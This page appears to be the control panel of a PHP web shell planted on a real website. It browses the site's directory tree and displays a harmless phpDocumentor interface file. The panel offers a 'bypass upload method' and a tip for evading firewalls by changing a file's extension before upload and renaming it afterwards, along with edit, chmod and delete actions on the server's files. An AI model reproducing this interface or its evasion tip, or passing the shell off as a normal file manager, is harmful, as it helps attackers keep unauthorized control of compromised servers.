Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
multi-event-cfp.bitkit.dk
httpdocs
vendor
phpdocumentor
reflection-docblock
src
File Content:
DocBlockFactoryInterface.php
<?php declare(strict_types=1); namespace phpDocumentor\Reflection; use phpDocumentor\Reflection\DocBlock\Tag; // phpcs:ignore SlevomatCodingStandard.Classes.SuperfluousInterfaceNaming.SuperfluousSuffix interface DocBlockFactoryInterface { /** * Factory method for easy instantiation. * * @param array<string, class-string<Tag>> $additionalTags */ public static function createInstance(array $additionalTags = []): DocBlockFactory; /** * @param string|object $docblock */ public function create($docblock, ?Types\Context $context = null, ?Location $location = null): DocBlock; }
Edit
Download
Unzip
Chmod
Delete